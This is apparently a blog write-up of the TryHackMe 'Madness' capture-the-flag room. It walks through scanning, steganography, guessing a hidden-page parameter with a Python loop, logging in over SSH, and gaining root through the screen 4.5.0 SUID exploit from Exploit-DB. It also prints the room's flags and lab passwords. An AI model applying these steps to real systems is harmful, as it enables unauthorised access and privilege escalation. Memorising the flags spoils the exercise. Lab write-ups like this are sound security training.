Madness
In this post, we will look into the room “Madness” from TryHackMe, which can be found on https://tryhackme.com
#1 - user.txt
Hint: There’s something ROTten about this guys name!
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ac:f9:85:10:52:65:6e:17:f5:1c:34:e7:d8:64:67:b1 (RSA) | 256 dd:8e:5a:ec:b1:95:cd:dc:4d:01:b3:fe:5f:4e:12:c1 (ECDSA) |_ 256 e9:ed:e3:eb:58:77:3b:00:5e:3a:f5:24:d8:58:34:8e (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Have a close look at the Apache2 Ubuntu default page, it has been modified:
$ curl -s http://10.10.109.114 [REDACTED] <body> <div class="main_page"> <div class="page_header floating_element"> <img src="thm.jpg" class="floating_element"/> <!-- They will never find me--> <span class="floating_element"> Apache2 Ubuntu Default Page </span> </div> <!-- <div class="table_of_contents floating_element"> <div class="section_header section_header_grey"> [REDACTED]
The file header (89 50 4e 47 0d 0a 1a 0a
) indicates that the file is a PNG while the extension is *.jpg
.
$ wget http://10.10.109.114/thm.jpg $ xxd thm.jpg | head 00000000: 8950 4e47 0d0a 1a0a 0000 0001 0100 0001 .PNG............ 00000010: 0001 0000 ffdb 0043 0003 0202 0302 0203 .......C........ 00000020: 0303 0304 0303 0405 0805 0504 0405 0a07 ................ 00000030: 0706 080c 0a0c 0c0b 0a0b 0b0d 0e12 100d ................ 00000040: 0e11 0e0b 0b10 1610 1113 1415 1515 0c0f ................ 00000050: 1718 1614 1812 1415 14ff db00 4301 0304 ............C... 00000060: 0405 0405 0905 0509 140d 0b0d 1414 1414 ................ 00000070: 1414 1414 1414 1414 1414 1414 1414 1414 ................ 00000080: 1414 1414 1414 1414 1414 1414 1414 1414 ................ 00000090: 1414 1414 1414 1414 1414 1414 1414 ffc0 ................
Let’s replace the header to match with a jpg:
$ printf '\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01' | dd conv=notrunc of=thm.jpg bs=1
The picture discloses a hidden location:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/ <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: </p> <p>That is wrong! Get outta here!</p> </div> </body> </html>
Based on the comment, we can guess that the page expects a number to be provided as argument:
$ curl -s http://10.10.109.114/th1s_1s_h1dd3n/?secret=34 <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: 34</p> <p>That is wrong! Get outta here!</p> </div> </body> </html>
OK, let’s script it in python:
#!/usr/bin/env python3 import requests host = '10.10.109.114' url = 'http://{}/th1s_1s_h1dd3n/?secret={}' for i in range(100): r = requests.get(url.format(host, i)) if not 'That is wrong!' in r.text: print("Found secret: {}".format(i)) print(r.text)
Here is the output of the script:
$ python secret.py Found secret: 73 <html> <head> <title>Hidden Directory</title> <link href="stylesheet.css" rel="stylesheet" type="text/css"> </head> <body> <div class="main"> <h2>Welcome! I have been expecting you!</h2> <p>To obtain my identity you need to guess my secret! </p> <!-- It's between 0-99 but I don't think anyone will look here--> <p>Secret Entered: 73</p> <p>Urgh, you got it right! But I won't tell you who I am! y2RPJ4QaPF!B</p> </div> </body> </html>
Looks like we have a password (y2RPJ4QaPF!B
) but no user name. And we are instructed not to brute force the SSH. I first tried a few usernames that I found relevant, but none was working:
- th1s_1s_h1dd3n
- th1s_1s_h1dd3n-73
- th1s_1s_h1dd3n_73
- madness
- madness73
- madness_73
- madness-73
- thm
- thm73
- thm_73
- thm-73
- seventythree
- seventy_three
- seventy-three
Then I saw the hint (There's something ROTten about this guys name!
) and thought there might be something else to get from the picture.
Nothing with binwalk, but steghide was luckier (use the password found as key):
$ steghide info thm.jpg "thm.jpg": format: jpeg capacity: 1.0 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "hidden.txt": size: 101.0 Byte encrypted: rijndael-128, cbc compressed: yes $ steghide extract -sf thm.jpg Enter passphrase: wrote extracted data to "hidden.txt". $ cat hidden.txt Fine you found the password! Here's a username wbxre I didn't say I would make it easy for you!
Now, let’s ROT13 this username:
$ echo -n "wbxre" | tr 'A-Za-z' 'N-ZA-Mn-za-m' joker
I tried to connect as joker
with the password, but no luck. I also tried to ROT13 the password, no luck either…
I’ll be honest, I was about to stop here and searched in one of the available writeups. I found that the password is located in the picture of this room…. Seriously, who would expect that? Anyway, let’s take this as a hint (it would maybe make sense to add a hint BTW).
Use steghide (with empty key) to reveal the password:
$ wget https://i.imgur.com/5iW7kC8.jpg $ steghide info 5iW7kC8.jpg "5iW7kC8.jpg": format: jpeg capacity: 6.6 KB Try to get information about embedded data ? (y/n) y Enter passphrase: embedded file "password.txt": size: 83.0 Byte encrypted: rijndael-128, cbc compressed: yes $ steghide extract -sf 5iW7kC8.jpg Enter passphrase: wrote extracted data to "password.txt". $ cat password.txt I didn't think you'd find me! Congratulations! Here take my password *axA&GF8dP
Great, now we have a valid user and password.
$ sshpass -p "*axA&GF8dP" ssh joker@10.10.109.114 joker@ubuntu:~$ pwd /home/joker joker@ubuntu:~$ cat user.txt THM{d5781e53b130efe2f94f9b0354a5e4ea}
User flag: THM{d5781e53b130efe2f94f9b0354a5e4ea}
#2 - root.txt
User has not sudo privileges, but there are interesting programs owned by root with the SUID bit set:
joker@ubuntu:~$ /bin/bash joker@ubuntu:~$ find / -user root -perm -u=s 2>/dev/null /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/bin/vmware-user-suid-wrapper /usr/bin/gpasswd /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/sudo /bin/fusermount /bin/su /bin/ping6 /bin/screen-4.5.0 /bin/screen-4.5.0.old /bin/mount /bin/ping /bin/umount joker@ubuntu:~$ ls -l /bin/screen* lrwxrwxrwx 1 root root 12 Jan 4 14:03 /bin/screen -> screen-4.5.0 -rwsr-xr-x 1 root root 1588648 Jan 4 14:03 /bin/screen-4.5.0 -rwsr-xr-x 1 root root 1588648 Jan 4 13:59 /bin/screen-4.5.0.old lrwxrwxrwx 1 root root 12 Jan 4 13:59 /bin/screen.old -> screen-4.5.0
Let’s find a way to leverage a root privilege with screen version 4.5.0 (https://www.exploit-db.com/exploits/41154). Download the exploit, transfer it to the target in /tmp
and execute it. For an unknown reason, the exploit failed to execute for me:
$ sh 41154.sh ~ gnu/screenroot ~ [+] First, we create our shell and library...
I analyzed it and created the /tmp/libhax.c
and rootshell.c
files myself, and compiled them. It worked this way.
# cat /root/root.txt THM{5ecd98aa66a6abb670184d7547c8124a}